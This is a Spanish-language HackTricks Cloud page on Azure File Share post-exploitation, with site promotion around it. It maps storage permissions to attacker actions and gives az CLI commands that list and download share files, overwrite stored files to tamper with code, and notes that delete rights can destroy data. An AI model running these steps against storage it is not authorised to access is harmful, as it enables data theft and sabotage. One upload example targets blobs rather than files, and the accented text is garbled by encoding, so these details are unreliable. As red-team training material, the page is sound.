Az - File Share Post Exploitation
Tip
Aprende y practica AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Apoya a HackTricks
- Consulta los subscription plans!
- 脷nete al 馃挰 Discord group o al telegram group o s铆guenos en Twitter 馃惁 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud github repos.
Explotaci贸n posterior a la compartici贸n de archivos
Para m谩s informaci贸n sobre las comparticiones de archivos, consulta:
Microsoft.Storage/storageAccounts/fileServices/fileshares/files/read
Un principal con este permiso podr谩 listar los archivos dentro de una compartici贸n de archivos y descargar los archivos que podr铆an contener informaci贸n sensible.
# List files inside an azure file share
az storage file list \
--account-name <name> \
--share-name <share-name> \
--auth-mode login --enable-file-backup-request-intent
# Download an specific file
az storage file download \
--account-name <name> \
--share-name <share-name> \
--path <filename-to-download> \
--dest /path/to/down \
--auth-mode login --enable-file-backup-request-intent
Microsoft.Storage/storageAccounts/fileServices/fileshares/files/write, Microsoft.Storage/storageAccounts/fileServices/writeFileBackupSemantics/action
Un principal con este permiso podr谩 escribir y sobrescribir archivos en comparticiones de archivos, lo que podr铆a permitirle causar alg煤n da帽o o incluso escalar privilegios (por ejemplo, sobrescribir alg煤n c贸digo almacenado en una compartici贸n de archivos):
az storage blob upload \
--account-name <acc-name> \
--container-name <container-name> \
--file /tmp/up.txt --auth-mode login --overwrite
*/delete
Esto permitir铆a eliminar archivos dentro del sistema de archivos compartido, lo que podr铆a interrumpir algunos servicios o hacer que el cliente pierda informaci贸n valiosa.
Tip
Aprende y practica AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Apoya a HackTricks
- Consulta los subscription plans!
- 脷nete al 馃挰 Discord group o al telegram group o s铆guenos en Twitter 馃惁 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud github repos.
HackTricks Cloud

